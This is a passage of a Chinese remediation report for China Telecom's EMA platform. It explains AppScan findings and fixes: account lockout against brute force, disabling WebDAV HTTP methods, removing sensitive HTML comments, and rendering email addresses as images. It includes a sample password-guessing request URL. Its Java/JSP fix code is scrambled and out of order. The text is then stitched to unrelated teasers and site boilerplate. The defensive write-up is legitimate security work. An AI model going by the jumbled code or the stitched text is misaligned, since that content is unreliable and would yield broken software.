不充分賬戶封鎖概述 蠻力攻擊是指惡意用戶發送大量可能的密碼和/或用戶名以訪問應用程序的嘗試。由于該技術包含大量登錄嘗試,未限制允許的錯誤登錄請求次數的應用程序很容易遭到這類攻擊。因此,強烈建議您對帳戶限制允許的錯誤登錄嘗試次數,超過該次數,便鎖定該帳戶。樣本利用: 下列請求說明密碼猜測請求: http://site/login.asp?username=EXISTING_USERNAME&password=GUESSED_PASSWORD 如果站點在若干次錯誤嘗試之后并不鎖定測試的帳戶,攻擊者最終可能會發現帳戶密碼,并使用它來假冒帳戶的合法用戶。6.2 安全風險及原因分析 安全風險高,可能會升級用戶特權并通過 Web 應用程序獲取管理許可權 原因:Web 應用程序編程或配置不安全 中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結 6.3 AppScan掃描建議 請確定允許的登錄嘗試次數(通常是 3-5 次),確保超出允許的嘗試次數之后,便鎖定帳戶。為了避免真正的用戶因帳戶被鎖定而致電支持人員的麻煩,可以僅臨時性暫掛帳戶活動,并在特定時間段之后啟用帳戶。帳戶鎖定大約 10 分鐘,通常便足以阻止蠻力攻擊。 6.4 應用程序解決方案 根據掃描建議,web應用程序設定允許登錄嘗試次數,登錄連續失敗超過設定次數,就鎖定用戶,失敗次數靈活配置。 在用戶登錄時進行驗證: if(!encrypter.encrypt(userPassword).equalsIgnoreCase({ } //更新此用戶登錄失敗次數 this.updateLoginFailTimes(userCode);//如果用戶連續登錄失敗次數超過配置值則將其鎖定 int loginLockTimes=this.getLoginLockTimes();if(this.getLoginFailTimes(userCode)>=loginLockTimes){ } throw new MySecurityException(”密碼不正確!用戶:“ + userCode);this.lockUser(userCode);user.getLOGIN_PASSWD()== null ? ”“ : user.getLOGIN_PASSWD()))7 啟用不安全HTTP方法 7.1 啟用不安全HTTP方法概述 似乎 Web 服務器配置成允許下列其中一個(或多個)HTTP 方法(動詞): -DELETE COPY PROPFIND LOCK-UNLOCK 這些方法可能表示在服務器上啟用了 WebDAV,可能允許未授權的用戶對其進行利用。 7.2 安全風險及原因分析 安全風險中,可能會在 Web 服務器上上載、修改或刪除 Web 頁面、腳本和文件 原因:Web 服務器或應用程序服務器是以不安全的方式配置的 7.3 AppScan掃描建議 如果服務器不需要支持 WebDAV,請務必禁用它,或禁止不必要的 HTTP 方法(動詞)。 7.4 應用程序解決方案 修改web工程中web.xml,增加安全配置信息,禁用不必要HTTP方法 中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結 。 很多 Web 應用程序程序員使用 HTML 注釋,以在需要時幫助調試應用程序。盡管添加常規注釋有助于調試應用程序,但一些程序員往往會遺留重要數據(例如:與 Web 應用程序相關的文件名、舊的鏈接或原非供用戶瀏覽的鏈接、舊的代碼片段等)。8.2 安全風險及原因分析 安全風險低,能會收集有關 Web 應用程序的敏感信息,如用戶名、密碼、機器名和/或敏感文件位置 原因:程序員在 Web 頁面上留下調試信息 8.3 AppScan掃描建議 [1] 請勿在 HTML 注釋中遺留任何重要信息(如文件名或文件路徑)。 [2] 從生產站點注釋中除去以前(或未來)站點鏈接的跟蹤信息。 [3] 避免在 HTML 注釋中放置敏感信息。 [4] 確保 HTML 注釋不包括源代碼片段。 [5] 確保程序員沒有遺留重要信息。 中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結 8.4 應用程序解決方案 雖然這個漏洞為低級別漏洞,但電信方也是要求必須修復,要修改此漏洞需要檢查工程中的每一個jsp頁面,工作量還是挺大。所以在后續開發過程中注釋盡量寫英文注釋,盡量不要遺留敏感注釋信息在jsp代碼中,養成良好的編碼習慣才是解決問題根本。發現電子郵件地址模式 9.1 發現電子郵件地址模式概述 Spambot 搜尋因特網站點,開始查找電子郵件地址來構建發送自發電子郵件(垃圾郵件)的郵件列表。AppScan 檢測到含有一或多個電子郵件地址的響應,可供利用以發送垃圾郵件。而且,找到的電子郵件地址也可能是專用電子郵件地址,對于一般大眾應是不可訪問的。9.2 安全風險及原因分析 安全風險低,能會收集有關 Web 應用程序的敏感信息,如用戶名、密碼、機器名和/或敏感文件位置 原因:Web 應用程序編程或配置不安全 9.3 AppScan掃描建議 從 Web 站點中除去任何電子郵件地址,使惡意的用戶無從利用。 9.4 應用程序解決方案 根據掃描建議刪除注釋中出現email地址信息,如果頁面中要顯示mail地址轉為圖片形式展示。如:ema服務管理平臺首頁需要展示客戶聯系方式,并且聯系方式、email等信息,這些信息用戶都是可以自行修改的,因為包含了email地址,所以聯系方式就轉為圖片形式: <%@ page language=”java“ contentType=”text/html;charset=gb2312“%> <%@ include file=”/common/taglib.jsp“ %> <%@ include file=”/common/chart.jsp“ %> <%@ page import=”java.util.List,java.util.*,java.awt.*,java.awt.image.*,com.su 17 中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結 n.image.codec.jpeg.*,java.util.*“ %> <%@ page import=”com.sitech.ismp.informationService.publish.dao.TB_SYS_SUPPORT_STAFFDao“ %> <% List typeList =(List)request.getAttribute(”typeList“);out.clear();out = pageContext.pushBody();response.addHeader(”pragma“,”NO-cache“);response.addHeader(”Cache-Control“,”no-cache“);response.addDateHeader(”Expries“,0);int rowheight=20; int width=135,height=rowheight*typeList.size();String ty= ”“;String mob=”“;for(int i=0;i HashMap hm=(HashMap)typeList.get(i);ty=(String)hm.get(”TYPE_ID“);List sta =(List)dao.findSupportStaffByTypeId(ty);for(int k=0;k TB_SYS_SUPPORT_STAFFDao dao= new TB_SYS_SUPPORT_STAFFDao();response.setContentType(”image/jpeg“); 中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結 HashMap map =(HashMap)sta.get(k); mob =(String)map.get(”MOBILE“); height+=3*rowheight; if(mob!=null)height+=rowheight; } } BufferedImage image = new BufferedImage(width, height, BufferedImage.TYPE_INT_RGB);Graphics g = image.getGraphics();g.setColor(Color.white);g.fillRect(0, 0, width, height);g.setColor(Color.BLUE);Font font=new Font(”宋體“,Font.PLAIN,13);g.setFont(font);int row=0; String typeid = ”“; String typename=”“; String name = ”“; String tel=”“; String mail = ”“; String mobile=”“; for(int i=0;i HashMap hm=(HashMap)typeList.get(i); typeid=(String)hm.get(”TYPE_ID“); typename=(String)hm.get(”TYPE_NAME“); row++; g.drawString(typename,0,(row-1)*rowheight+10); List staffs =(List)dao.findSupportStaffByTypeId(typeid); for(int k=0;k HashMap map =(HashMap)staffs.get(k); name =(String)map.get(”NAME“); tel =(String)map.get(”TEL“); mail =(String)map.get(”MAIL“); mobile =(String)map.get(”MOBILE“); row++; g.drawString(name+”:"+tel,0,(row-1)*rowheight+10); row++; g.drawString(mail,0,(row-1)*rowheight+10); if(mobile!=null){ row++; g.drawString(mail,0,(row-1)*rowheight+10);} 19 中國電信EMA服務管理平臺二期擴容安全驗收漏洞修復總結 } } g.dispose();ServletOutputStream outStream = response.getOutputStream(); JPEGImageEncoder encoder encoder.encode(image);outStream.close();=JPEGCodec.createJPEGEncoder(outStream);%> 文檔為doc格式 一、工作上的漏洞 (一) 具體體現: 1、 學習不夠,沒有把科學發展觀理論與學校教育教學緊密結合。在運用科學發展理論來指導教育教學時,眼光過度關注學校發展,忽視了科學發展理論對...... 縣農村信用合作聯社科技信息部 內部控制缺陷和漏洞梳理排查情況進展報告 風險合規部: 《關于印發縣農村信用合作聯社內部控制缺陷和漏洞梳理排查工作實施細則的通知》(農信發﹝2...... 不相容職務不分離案例案例一
2004年10月19號,北京市中級人民法院開庭審理原國家自然科學基金委員會資金管理處會計卞中涉嫌貪污挪用公款2.2億元的巨額資金一案,卞中被判死緩。...... 資源綜合利用情況總結我公司自2012年3月通過資源綜合利用企業再認定以來,緊緊抓住城市綜合建設、小城鎮新規劃快速發展對水泥需求較大有利機遇,把資源綜合利用工作作為生產經...... 開展“查管理,堵漏洞”活動總結 4月10日,我們收聽了國家電力公司關于開展“求真務實、作風建設年”活動的電視電話會議,這個會議體現了國電公司領導對作風建設的高度重視。會后...... 網站安全整改報告 收到教育局中心機房發來的網站安全漏洞檢測報告,對被檢測的域名地址進行確認,我校主要近階段處在新舊網站交替時期,舊網站還沒有退役,新網站也已上線。被檢測...... 漏洞整改報告 1. 漏洞信息 Apache Struts2遠程命令執行漏洞,可以遠程執行命令,獲取敏感信息。 2. 漏洞原因分析 Apache Struts2 版本較低, 不是最新版本; 3. 漏洞處理過程 升...... 超市收銀漏洞如何監管 收銀漏洞說白了就是收銀員有這樣那樣的損公肥私(包括家人)行為,將本不屬于自己的錢據為己有,超市方卻又無法做到真正的控制。收銀漏洞這樣的行為放任下去,......
運營中心聯系方式
聲明:本文內容由互聯網用戶自發貢獻自行上傳,本網站不擁有所有權,未作人工編輯處理,也不承擔相關法律責任。如果您發現有涉嫌版權的內容,歡迎發送郵件至:645879355@qq.com 進行舉報,并提供相關證據,工作人員會在5個工作日內聯系你,一經查實,本站將立刻刪除涉嫌侵權內容。 工作上的漏洞
漏洞排查情況報告(★)
內控漏洞案例
資源利用總結
開展“查管理,堵漏洞”活動總結
網站漏洞整改報告
漏洞整改報告IDC-ISP
超市收銀漏洞如何監管